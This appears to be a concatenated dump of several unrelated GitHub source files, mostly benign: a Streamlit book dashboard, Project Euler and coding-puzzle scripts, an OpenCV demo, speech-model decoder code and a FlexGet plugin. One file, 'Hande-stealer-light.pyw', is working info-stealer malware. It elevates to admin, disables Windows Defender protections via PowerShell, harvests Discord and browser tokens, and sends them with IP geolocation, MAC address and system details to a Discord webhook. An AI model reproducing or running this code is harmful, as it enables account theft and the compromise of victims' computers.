ab6d591fb1096d67a92f1b2f9be58d471222ea9a
|
37fef592f365194c28579f95abd222cc4e1243ae
|
/streamlit/book_recommender/Overview.py
|
3a38ef090b172cb0a6ec3907446d749998ff6fca
|
[] |
no_license
|
edimaudo/Python-projects
|
be61e0d3fff63fb7bd00513dbf1401e2c1822cfb
|
85d54badf82a0b653587a02e99daf389df62e012
|
refs/heads/master
| 2023-04-07T03:26:23.259959
| 2023-03-24T12:03:03
| 2023-03-24T12:03:03
| 72,611,253
| 4
| 3
| null | 2022-10-31T18:10:41
| 2016-11-02T06:37:17
| null |
UTF-8
|
Python
| false
| false
| 3,298
|
py
|
#================
# Book Overview
#================
# Load libraries
import streamlit as st
import pandas as pd
import plotly.express as px
import os, os.path
st.title('Book Overview')
@st.cache
def load_data(DATA_URL):
data = pd.read_csv(DATA_URL)
data.dropna(inplace=True)
return data
# Load data
books = load_data("BX-Books_clean.csv")
users = load_data("BX-Users_clean.csv")
ratings = load_data("BX-Book-Ratings_clean.csv")
#====================
# Raw data
#====================
st.subheader("Book data")
with st.expander("Open to see more",expanded=False):
st.dataframe(books)
st.subheader("Book Data Summary")
# AVERAGE RATING
average_rating = "{:.2f}".format(ratings['bookRating'].mean())
# AVERAGE AGE
average_age= "{:.2f}".format(users['Age'].mean())
# NUMBER OF USERS
number_of_users = users['userID'].count()
# NUMBER OF BOOKS
number_of_books = books['ISBN'].count()
# TOP 5 PUBLISHERS AND BOTTOM 5 PUBLISHERS
book_info = books.groupby(["publisher"]).size().reset_index(name='count')
book_info.columns = ['Publisher','Count']
book_info = book_info.sort_values("Count", ascending=False)
top_5_publishers = book_info.head(5)
bottom_5_publishers = book_info.tail(5)
# TOP 5 AUTHORS AND BOTTOM 5 AUTHORS
author_info = books.groupby(["bookAuthor"]).size().reset_index(name='count')
author_info.columns = ['Author','Count']
author_info = author_info.sort_values("Count", ascending=False)
top_5_authors = author_info.head(5)
bottom_5_authors = author_info.tail(5)
# NUMBER OF BOOKS BY YEAR
book_year_info = books.groupby(["yearOfPublication"]).size().reset_index(name='count')
book_year_info.columns = ['Year','Count']
book_year_info = book_year_info.sort_values("Year", ascending=False)
# TOP AND BOTTOM 5 COUNTRIES
country_info = users.groupby(["Country"]).size().reset_index(name='count')
country_info.columns = ['Country','Count']
country_info = country_info.sort_values("Count", ascending=False)
top_5_countries = country_info.head(5)
bottom_5_countries = country_info.tail(5)
# Metrics
metric1_column, metric2_column,metric3_column,metric4_column = st.columns(4)
metric1_column.metric("Avg. Rating", average_rating)
metric2_column.metric("# of Users", number_of_users)
metric3_column.metric("# of Books", number_of_books)
metric4_column.metric("Avg. Age", average_age)
# Publisher
st.subheader("Top and Bottom 5 Publishers")
st.write("Top 5 Publishers")
output = px.bar(top_5_publishers, x="Publisher", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Publishers")
output = px.bar(bottom_5_publishers, x="Publisher", y="Count")
st.plotly_chart(output)
# Author
st.subheader("Top and Bottom 5 Authors")
st.write("Top 5 Authors")
output = px.bar(top_5_authors, x="Author", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Authors")
output = px.bar(bottom_5_authors, x="Author", y="Count")
st.plotly_chart(output)
# Country
st.subheader("Top and Bottom 5 Countries")
st.write("Top 5 Countries")
output = px.bar(top_5_countries, x="Country", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Countries")
output = px.bar(bottom_5_countries, x="Country", y="Count")
st.plotly_chart(output)
# books by year
st.subheader("Books by Year Trend")
output = px.line(book_year_info, x="Year", y="Count")
st.plotly_chart(output)
|
[
"edimaudo@gmail.com"
] |
edimaudo@gmail.com
|
bb0b96e5d3a9763e899440f021b68306c0ff6345
|
022a0cb0d0873da0c25da6b6aa8b258b80a4b7e0
|
/165.py
|
933086226d00282a90482d8c4273a8718bea1615
|
[] |
no_license
|
subayadhav/fri07061
|
31e1e89ac1be60c736450f749486651968cfeba4
|
380f5d108869ad4cde16140dc21a88f2a7972722
|
refs/heads/master
| 2020-06-01T06:43:17.094510
| 2019-06-07T08:47:49
| 2019-06-07T08:47:49
| 190,683,539
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
n1,k=map(int,input().split())
l=[int(x) for x in input().split()]
l.sort()
for i in l:
if i>k:
print(i)
break
|
[
"noreply@github.com"
] |
subayadhav.noreply@github.com
|
eb505b88bac2629ad98d57305ff289ab7e507c38
|
94d1e805521575afb7b6256af1dd6de65a50ada9
|
/problem_5/problem_5.py
|
458d419fed34ea5f74c68c10e9d6c3fe6dc7dbf6
|
[] |
no_license
|
John-W-Stevens/Euler100
|
fe2004786f64172e02ba18fbe33d95ceb68abf59
|
6f193a47e9e019b99ee9b188d2227587f5a3f4b3
|
refs/heads/master
| 2022-11-26T07:23:36.505138
| 2020-07-28T17:36:39
| 2020-07-28T17:36:39
| 274,224,709
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,828
|
py
|
# 2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.
# What is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?
import time
def is_prime(n):
""" Returns Boolean """
if n <= 1: return False
if n == 2 or n == 3: return True
if n % 2 == 0 or n % 3 == 0: return False
i, w, = 5, 2
while i * i <= n:
if n % i == 0:
return False
i += w
w = 6 - w
return True
def prime_factorization(n):
"""
Assumes n >= 2
Returns a dict mapping the prime factors of n and their respective powers
"""
if is_prime(n):
return {n: 1}
prime_factors = {2:0, 3:0,}
while n % 2 == 0:
prime_factors[2] += 1
n /= 2
while n % 3 == 0:
prime_factors[3] += 1
n /= 3
for i in range(5, int(n**0.5)+1, 2):
if not is_prime(i):
continue
while n % i == 0:
try:
prime_factors[i] += 1
except KeyError:
prime_factors[i] = 1
n /= i
return prime_factors
def problem_5(n):
""" Returns the smallest number divisible by every number <= n """
output = 1
prime_factor_map = {}
for i in range(2, n+1):
prime_factors = prime_factorization(i)
for p,e in prime_factors.items():
try:
if prime_factor_map[p] < e:
prime_factor_map[p] = e
except KeyError:
prime_factor_map[p] = e
for p,e in prime_factor_map.items():
output *= pow(p,e)
return output
start = time.time()
solution = problem_5(20)
print(f"{solution} found in {time.time() - start} seconds.")
# 232792560 found in 3.1948089599609375e-05 seconds.
|
[
"john.william.stevens1@gmail.com"
] |
john.william.stevens1@gmail.com
|
f6626102fabf2650c694713c2ad5149437e06451
|
0dec4bee4820161ae892f615023dd6ff9dae8ff4
|
/PyMrawler/SocialEventCrawlerGR/Links.py
|
40ddb5a031bebced3cf662f7c038a859ef7f5f1d
|
[] |
no_license
|
mpetyx/PyMrawler
|
8fbf77276838f3e26b746205f5ded33e9c5be559
|
6f7dc608620ddfff1c3021aa740cf8409a7eb311
|
refs/heads/master
| 2016-09-10T00:16:49.353207
| 2012-10-17T10:13:15
| 2012-10-17T10:13:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,323
|
py
|
'''
Created on 11 Dec 2011
@author: mpetyx
'''
class Link:
def __init__(self,text):
"""
Here we search all the links included in the description
"""
self.links = None
from TextHandling import TextFunctions
self.text = TextFunctions(text)
self.lines = self.text.lines
self.words = []
def links(self):
import re
# parsing addresses
# http://stackoverflow.com/questions/6173/regular-expression-for-parsing-links-from-a-webpage
self.links = re.findall(r'\b(https?|ftp|file)://[-A-Z0-9+&@#/%?=~_|!:,.;]*[-A-Z0-9+&@#/%=~_|]',self.text)
def youtube(self):
self.youtubeLinks = []
for link in self.links:
if "youtube" in link:
self.youtubeLinks.append(link)
return self.youtubeLinks
def parse_url(self):
e=r'/((http|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+\.[^#?\s]+)(#[\w\-]+)?/'
e2=r'/^((http|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+\.[^#?\s]+)(#[\w\-]+)?$/'
def simple_parse(self):
for line in self.lines:
if "www" in line:
print line
|
[
"mpetyx@gmail.com"
] |
mpetyx@gmail.com
|
34356c92a49affa75602a75e6add206fdd9417a7
|
012837eafe45c8f7ee5fc77d4c4d7725d5314c5c
|
/workshops/8-day/8-clazz.py
|
6322475cba90b04e02f631dcfd665c48f6e3d371
|
[
"MIT"
] |
permissive
|
ai-erorr404/opencv-practice
|
e9408cf006779a678cf3a30fc60e9dbeb3c8e493
|
60ef5e4aec61ee5f7e675fb919e8f612e59f664a
|
refs/heads/master
| 2021-02-08T11:17:04.763522
| 2020-02-22T09:43:04
| 2020-02-22T09:43:04
| 244,146,060
| 1
| 1
|
MIT
| 2020-03-01T12:35:02
| 2020-03-01T12:35:01
| null |
UTF-8
|
Python
| false
| false
| 1,854
|
py
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
import cv2 as cv
"""
视频前景/背景提取
视频前景/背景提取技术用于提取前景移动对象,通过获取移动对象的mask实现获取移动物体的轮廓信息,最常用的方法是帧差相减法进行,即用
前一帧的图像最为背景图像与当前帧进行相减,该方法对光照、噪声相当敏感。opencv中对背景模型提取的算法有两种,一种是基于高斯模糊模型(GMM)
实现背景提取,另外一种是使用最近相邻模型(KNN)实现的,api如下:
GMM cv.createBackgroundSubtractorMOG2(history, varThreshold, detectShadows)
- history: 过往帧数,默认500帧,历史进行比较
- varThreshold: 马氏距离,默认16,值越大,最新的像素会归为前景,值越小对光照敏感
- detectShadow: 是否保留阴影检测,默认True, 开启阴影检测虽然可以提高提取效果,但是效率会变低,推荐不开启
KNN cv.createBackgroundSubtractorKNN()的参数描述如上
"""
def main():
capture = cv.VideoCapture(0)
# mog2bs = cv.createBackgroundSubtractorKNN(500, 1000, False) # KNN模型
mog2bs = cv.createBackgroundSubtractorMOG2(300) # GMM模型
while True:
ret, frame = capture.read()
if True is not ret:
print("can't read any video!")
break
mask = mog2bs.apply(frame)
background = mog2bs.getBackgroundImage()
cv.imshow("input", frame)
cv.imshow("mask", mask)
cv.imshow("background", background)
key = cv.waitKey(10) & 0xff
if 27 == key: # ESC
break
cv.destroyAllWindows()
capture.release()
if "__main__" == __name__:
main()
|
[
"afterloe@foxmail.com"
] |
afterloe@foxmail.com
|
0c1776f6bd320e7f308bee7b96fd85ce0f010a7c
|
aed0016db7f4d22e7d66e6fddb7bf4ef68a3c692
|
/neural_sp/models/seq2seq/decoders/build.py
|
0f813cfcdda9ab87c1f3eab770b881268e309039
|
[] |
no_license
|
thanhkm/neural_sp
|
6a5575111c83d1fdd97edec21f90fe647965cb69
|
1a5a5ed54f4cb79436007593dbd0d782b246a0c7
|
refs/heads/master
| 2020-12-26T23:22:56.964151
| 2020-01-15T23:40:22
| 2020-01-15T23:40:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,001
|
py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Select an decoder network."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def build_decoder(args, special_symbols, enc_n_units, vocab,
ctc_weight, ctc_fc_list, global_weight,
lm_fusion=None, lm_init=None):
if args.dec_type == 'transformer':
if args.attn_type == 'cif':
raise NotImplementedError
else:
from neural_sp.models.seq2seq.decoders.transformer import TransformerDecoder
decoder = TransformerDecoder(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.transformer_attn_type,
n_heads=args.transformer_n_heads,
n_layers=args.dec_n_layers,
d_model=args.transformer_d_model,
d_ff=args.transformer_d_ff,
layer_norm_eps=args.transformer_layer_norm_eps,
ffn_activation=args.transformer_ffn_activation,
pe_type=args.transformer_dec_pe_type,
vocab=vocab,
tie_embedding=args.tie_embedding,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
backward=(dir == 'bwd'),
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.transformer_param_init)
elif args.dec_type == 'transformer_transducer':
raise NotImplementedError
from neural_sp.models.seq2seq.decoders.transformer_transducer import TrasformerTransducer
decoder = TrasformerTransducer(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.transformer_attn_type,
n_heads=args.transformer_n_heads,
n_layers=args.dec_n_layers,
d_model=args.transformer_d_model,
d_ff=args.transformer_d_ff,
layer_norm_eps=args.transformer_layer_norm_eps,
ffn_activation=args.transformer_ffn_activation,
pe_type=args.transformer_dec_pe_type,
vocab=vocab,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.transformer_param_init)
elif args.dec_type in ['lstm_transducer', 'gru_transducer']:
from neural_sp.models.seq2seq.decoders.rnn_transducer import RNNTransducer
decoder = RNNTransducer(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
rnn_type=args.dec_type,
n_units=args.dec_n_units,
n_projs=args.dec_n_projs,
n_layers=args.dec_n_layers,
bottleneck_dim=args.dec_bottleneck_dim,
emb_dim=args.emb_dim,
vocab=vocab,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.param_init)
else:
from neural_sp.models.seq2seq.decoders.las import RNNDecoder
decoder = RNNDecoder(
special_symbols=special_symbols,
enc_n_units=enc_n_units,
attn_type=args.attn_type,
attn_dim=args.attn_dim,
attn_sharpening_factor=args.attn_sharpening_factor,
attn_sigmoid_smoothing=args.attn_sigmoid,
attn_conv_out_channels=args.attn_conv_n_channels,
attn_conv_kernel_size=args.attn_conv_width,
attn_n_heads=args.attn_n_heads,
rnn_type=args.dec_type,
n_units=args.dec_n_units,
n_projs=args.dec_n_projs,
n_layers=args.dec_n_layers,
bottleneck_dim=args.dec_bottleneck_dim,
emb_dim=args.emb_dim,
vocab=vocab,
tie_embedding=args.tie_embedding,
dropout=args.dropout_dec,
dropout_emb=args.dropout_emb,
dropout_att=args.dropout_att,
ss_prob=args.ss_prob,
ss_type=args.ss_type,
lsm_prob=args.lsm_prob,
ctc_weight=ctc_weight,
ctc_lsm_prob=args.ctc_lsm_prob,
ctc_fc_list=ctc_fc_list,
mbr_weight=args.mbr_weight,
mbr_nbest=args.mbr_nbest,
mbr_softmax_smoothing=args.mbr_softmax_smoothing,
backward=(dir == 'bwd'),
lm_fusion=lm_fusion,
lm_fusion_type=args.lm_fusion_type,
discourse_aware=args.discourse_aware,
lm_init=lm_init,
global_weight=global_weight,
mtl_per_batch=args.mtl_per_batch,
param_init=args.param_init,
mocha_chunk_size=args.mocha_chunk_size,
mocha_adaptive=args.mocha_adaptive,
mocha_1dconv=args.mocha_1dconv,
mocha_quantity_loss_weight=args.mocha_quantity_loss_weight,
mocha_ctc_sync=args.mocha_ctc_sync,
gmm_attn_n_mixtures=args.gmm_attn_n_mixtures,
replace_sos=args.replace_sos,
soft_label_weight=args.soft_label_weight)
return decoder
|
[
"hiro.mhbc@gmail.com"
] |
hiro.mhbc@gmail.com
|
f922cf4ebb4055119a9e0e2468630b05bc1bef64
|
4c156a21245ad414e9495a5f59cf4d4427759255
|
/Hande-stealer-light.pyw
|
bc3b565fbf2f6a752a14e35e78d669b8ef71b666
|
[
"MIT"
] |
permissive
|
simplifies/Hande-Stealer
|
f464bd56695726058d2a6084f6ba6cd7afd33ba6
|
da5244c774e9bf66c5c1870b6cab3d194b4890ff
|
refs/heads/main
| 2023-04-06T07:07:38.471222
| 2021-04-13T10:52:42
| 2021-04-13T10:52:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,537
|
pyw
|
import os
import re
import platform
import time
import requests
from io import BytesIO
import json
from dhooks import Webhook, Embed, File
from datetime import datetime
import sys
import win32com.shell.shell as shell
from getmac import get_mac_address as gma
ASADMIN = 'asadmin'
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
os.system("powershell.exe -command Add-MpPreference -ExclusionExtension .exe")
os.system("powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled")
os.system("powershell.exe -command Set-MpPreference -PUAProtection disable")
hook = Webhook("https://Your Webhook Url") #change this
embed = Embed(
description='Hande-Stealer From Swagkarna! :smiley:',
color=0x5CDBF0,
timestamp='now'
)
image1 = 'https://avatars.githubusercontent.com/u/79452028?s=460&u=0602f46611611527d9f4147aa67c47fa4b2fe739&v=4'
embed.set_author(name='Author : swagkarna', icon_url=image1)
embed.add_field(name='Github Profile', value='https://github.com/swagkarna')
embed.add_field(name='Youtube', value='https://www.youtube.com/channel/UCszs81OmjgsLzNsgk3f4yxw')
embed.set_footer(text='Happy Hacking', icon_url=image1)
embed.set_thumbnail(image1)
hook.send(embed=embed)
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
time.sleep(1)
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
message = ''
paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
for platform, path in paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
if len(tokens) > 0:
for token in tokens:
message += f'`{token}`\n\n'
else:
message += 'No tokens found.\n'
hook.send(f'{platform}\n{message}')
main()
def stealip():
time = datetime.now().strftime("%H:%M %p")
ip = requests.get('https://api.ipify.org/').text
r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}')
geo = r.json()
embed = Embed()
fields = [
{'name': 'IP', 'value': geo['query']},
{'name': 'ipType', 'value': geo['ipType']},
{'name': 'Country', 'value': geo['country']},
{'name': 'City', 'value': geo['city']},
{'name': 'Continent', 'value': geo['continent']},
{'name': 'Country', 'value': geo['country']},
{'name': 'IPName', 'value': geo['ipName']},
{'name': 'ISP', 'value': geo['isp']},
{'name': 'Latitute', 'value': geo['lat']},
{'name': 'Longitude', 'value': geo['lon']},
{'name': 'Org', 'value': geo['org']},
{'name': 'Region', 'value': geo['region']},
{'name': 'Status', 'value': geo['status']},
]
for field in fields:
if field['value']:
embed.add_field(name=field['name'], value=field['value'], inline=True)
hook.send(embed=embed)
def stealmac():
y = gma()
hook.send("Mac Address : ")
hook.send(y)
stealmac()
def GetSysInfo():
my_system = platform.uname()
hook.send("System Information : ")
hook.send(f"System: {my_system.system}")
hook.send(f"Node Name: {my_system.node}")
hook.send(f"Release: {my_system.release}")
hook.send(f"Version: {my_system.version}")
hook.send(f"Machine: {my_system.machine}")
hook.send(f"Processor: {my_system.processor}")
GetSysInfo()
stealip()
|
[
"noreply@github.com"
] |
simplifies.noreply@github.com
|
f2ae332d7f80b1cdc90b00f90cafce55f4156e08
|
136c4241843a000020062413ad6ff4d6de8bdf58
|
/flexget/plugins/services/myepisodes.py
|
95187a0788efde709113b6c8e52b0f8b0411d974
|
[
"MIT"
] |
permissive
|
ebadenes/Flexget-Origin
|
d580b9d0bcd65999d2bba6a7051ed19713c7792d
|
abc05c8bb99f5241b509c3e403eb399413a60dac
|
refs/heads/master
| 2021-01-16T19:22:39.003993
| 2013-04-29T17:32:32
| 2013-04-29T17:32:32
| 9,701,035
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,693
|
py
|
from __future__ import unicode_literals, division, absolute_import
import logging
import urllib
import urllib2
import re
import cookielib
from datetime import datetime
from sqlalchemy import Column, Integer, String, DateTime
from flexget import schema
from flexget.plugin import register_plugin, DependencyError, PluginWarning
try:
from flexget.plugins.api_tvdb import lookup_series
except ImportError:
raise DependencyError(issued_by='myepisodes', missing='api_tvdb',
message='myepisodes requires the `api_tvdb` plugin')
log = logging.getLogger('myepisodes')
Base = schema.versioned_base('myepisodes', 0)
class MyEpisodesInfo(Base):
__tablename__ = 'myepisodes'
id = Column(Integer, primary_key=True)
series_name = Column(String, unique=True)
myepisodes_id = Column(Integer, unique=True)
updated = Column(DateTime)
def __init__(self, series_name, myepisodes_id):
self.series_name = series_name
self.myepisodes_id = myepisodes_id
self.updated = datetime.now()
def __repr__(self):
return '<MyEpisodesInfo(series_name=%s, myepisodes_id=%s)>' % (self.series_name, self.myepisodes_id)
class MyEpisodes(object):
"""
Marks a series episode as acquired in your myepisodes.com account.
Simple Example:
Most shows are recognized automatically from their TVDBname.
And of course the plugin needs to know your MyEpisodes.com account details.
tasks:
tvshows:
myepisodes:
username: <username>
password: <password>
series:
- human target
- chuck
Advanced Example:
In some cases, the TVDB name is either not unique or won't even be discovered.
In that case you need to specify the MyEpisodes id manually using the set plugin.
tasks:
tvshows:
myepisodes:
username: <username>
password: <password>
series:
- human target:
set:
myepisodes_id: 5111
- chuck
How to find the MyEpisodes id: http://matrixagents.org/screencasts/myep_example-20110507-131555.png
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('text', key='username', required=True)
root.accept('text', key='password', required=True)
return root
def on_task_exit(self, task, config):
"""Mark all accepted episodes as acquired on MyEpisodes"""
if not task.accepted:
# Nothing accepted, don't do anything
return
username = config['username']
password = config['password']
cookiejar = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
baseurl = urllib2.Request('http://myepisodes.com/login.php?')
loginparams = urllib.urlencode({'username': username,
'password': password,
'action': 'Login'})
try:
logincon = opener.open(baseurl, loginparams)
loginsrc = logincon.read()
except urllib2.URLError as e:
log.error('Error logging in to myepisodes: %s' % e)
return
if str(username) not in loginsrc:
raise PluginWarning(('Login to myepisodes.com failed, please check '
'your account data or see if the site is down.'), log)
for entry in task.accepted:
try:
self.mark_episode(task, entry, opener)
except PluginWarning as w:
log.warning(str(w))
def lookup_myepisodes_id(self, entry, opener, session):
"""Populates myepisodes_id field for an entry, and returns the id.
Call will also set entry field `myepisode_id` if successful.
Return:
myepisode id
Raises:
LookupError if entry does not have field series_name
"""
# Don't need to look it up if we already have it.
if entry.get('myepisodes_id'):
return entry['myepisodes_id']
if not entry.get('series_name'):
raise LookupError('Cannot lookup myepisodes id for entries without series_name')
series_name = entry['series_name']
# First check if we already have a myepisodes id stored for this series
myepisodes_info = session.query(MyEpisodesInfo).\
filter(MyEpisodesInfo.series_name == series_name.lower()).first()
if myepisodes_info:
entry['myepisodes_id'] = myepisodes_info.myepisodes_id
return myepisodes_info.myepisodes_id
# Get the series name from thetvdb to increase match chance on myepisodes
if entry.get('tvdb_series_name'):
query_name = entry['tvdb_series_name']
else:
try:
series = lookup_series(name=series_name, tvdb_id=entry.get('tvdb_id'))
query_name = series.seriesname
except LookupError as e:
log.warning('Unable to lookup series `%s` from tvdb, using raw name.' % series_name)
query_name = series_name
baseurl = urllib2.Request('http://myepisodes.com/search.php?')
params = urllib.urlencode({'tvshow': query_name, 'action': 'Search myepisodes.com'})
try:
con = opener.open(baseurl, params)
txt = con.read()
except urllib2.URLError as e:
log.error('Error searching for myepisodes id: %s' % e)
matchObj = re.search(r'&showid=([0-9]*)">' + query_name + '</a>', txt, re.MULTILINE | re.IGNORECASE)
if matchObj:
myepisodes_id = matchObj.group(1)
db_item = session.query(MyEpisodesInfo).filter(MyEpisodesInfo.myepisodes_id == myepisodes_id).first()
if db_item:
log.info('Changing name to `%s` for series with myepisodes_id %s' %
(series_name.lower(), myepisodes_id))
db_item.series_name = series_name.lower()
else:
session.add(MyEpisodesInfo(series_name.lower(), myepisodes_id))
entry['myepisodes_id'] = myepisodes_id
return myepisodes_id
    def mark_episode(self, task, entry, opener):
        """Mark episode as acquired.

        Required entry fields:
            - series_name
            - series_season
            - series_episode

        Raises:
            PluginWarning if operation fails
        """
        # All three identifying fields are required to address the episode.
        if 'series_season' not in entry or 'series_episode' not in entry or 'series_name' not in entry:
            raise PluginWarning(
                'Can\'t mark entry `%s` in myepisodes without series_season, series_episode and series_name fields' %
                entry['title'], log)
        # Resolve (and cache) the myepisodes id first; abort when unavailable.
        if not self.lookup_myepisodes_id(entry, opener, session=task.session):
            raise PluginWarning('Couldn\'t get myepisodes id for `%s`' % entry['title'], log)
        myepisodes_id = entry['myepisodes_id']
        season = entry['series_season']
        episode = entry['series_episode']
        if task.manager.options.test:
            # Dry-run mode: log only, do not hit the remote service.
            log.info('Would mark %s of `%s` as acquired.' % (entry['series_id'], entry['series_name']))
        else:
            # Fire the update request; seen=0 presumably means "acquired, not
            # watched" on myepisodes — confirm against their API docs.
            baseurl2 = urllib2.Request(
                'http://myepisodes.com/myshows.php?action=Update&showid=%s&season=%s&episode=%s&seen=0' %
                (myepisodes_id, season, episode))
            opener.open(baseurl2)
            log.info('Marked %s of `%s` as acquired.' % (entry['series_id'], entry['series_name']))
register_plugin(MyEpisodes, 'myepisodes', api_ver=2)
|
[
"chase.sterling@gmail.com"
] |
chase.sterling@gmail.com
|
2960c363204b3c970270b04ba3da510e16c8b043
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_3/joshg111/c.py
|
3247ad1bc43608716c4eafcf837e3f50658944a0
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,836
|
py
|
import fileinput
from math import sqrt; from itertools import count, islice
def get_divisor(x):
# Stopping checking for divisors when we hit some pre defined maximum.
#for i in islice(count(2), 1000000):
for i in xrange(2, 1000):
if (x % i) == 0:
# This is the case it is not a prime. Return the divisor.
return i
# This is a prime. Unable to get divisor.
return None
def init(n):
    """Return 10**(n-1) + 1: an n-digit number '1 0...0 1' (2 for n == 1).

    Closed form of the original multiply-by-ten accumulation loop; identical
    results for every n >= 1.
    """
    return 10 ** (n - 1) + 1
def gen_num(n):
    """Yield all n-character binary strings that start and end with '1'.

    The middle n-2 characters enumerate every bit pattern in increasing
    numeric order. NOTE: for n < 3 the zero-width format spec still emits one
    digit, so outputs are not n characters — quirk preserved from the
    original implementation.
    """
    middle_len = n - 2
    # `range` instead of Python-2-only `xrange`; same iteration behavior.
    for i in range(2 ** middle_len):
        # '0<width>b' zero-pads the binary representation to middle_len chars.
        middle = format(i, '0%db' % middle_len)
        yield '1' + middle + '1'
def output_jam(s, divisors):
    """Write one jamcoin line: the coin string followed by its divisors.

    Writes to the module-level output file handle `f` (opened below).
    """
    f.write(s + " ")
    for d in divisors:
        f.write(str(d) + " ")
    f.write("\n")
def gen_jamcoin(n, j):
    """Find and output j jamcoins of length n.

    A jamcoin here is a 0/1 string (starting and ending with '1') that has a
    small divisor when interpreted in every base 2..10; the witness divisors
    are written alongside it via output_jam. Python 2 code: uses `xrange`,
    `long`, generator `.next()` and the print statement.
    """
    jams = 0
    g_i = gen_num(n)
    while jams < j:
        s = g_i.next()
        divisors = []
        found_jam = True
        for b in xrange(2, 11):
            # Check all the bases
            divisor = get_divisor(long(s, b))
            if not divisor:
                # No small divisor in this base -> not a jamcoin, try next s.
                found_jam = False
                break
            else:
                divisors.append(divisor)
        if found_jam:
            output_jam(s, divisors)
            jams += 1
            print "jams = " + str(jams)
# Output file for discovered jamcoins; opened at import time, closed at the end.
f = open('workfile_large', 'w')

if __name__ == "__main__":
    i = 1
    f_i = fileinput.input()
    # First input line is the number of test cases (consumed, otherwise unused).
    tests = f_i.next()
    for line in f_i:
        # Each case line: n (coin length) and j (number of coins to emit).
        n, j = map(int, line.split(' '))
        f.write("Case #" + str(i) + ":\n")
        gen_jamcoin(n, j)
        i += 1
    f.close()
    f_i.close()
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
f3627f85293749abf4bdc02e42166c7f1307955f
|
779c7d032eb8d5a4421b8b236c9004559b70756d
|
/import/drop_cache_tables.py
|
b74d0ed6091fcc4373b1d48df17bf6f274748eb8
|
[] |
no_license
|
corincerami/opus
|
727e91a461a6488f2bc263ca6c98a27a93424228
|
281f246ff5bd703a009ab3bad6271249e0e00bff
|
refs/heads/master
| 2022-11-11T13:46:06.317320
| 2018-01-11T00:33:54
| 2018-01-11T00:33:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,262
|
py
|
"""
drops all tables like 'cache%' in database 'opus'
"""
# Set up the Django Enviroment for running as shell script
import sys
import os
import django
from django.conf import settings
# sys.path.append('/Users/lballard/projects/opus/')
sys.path.append('/home/django/djcode/') #srvr
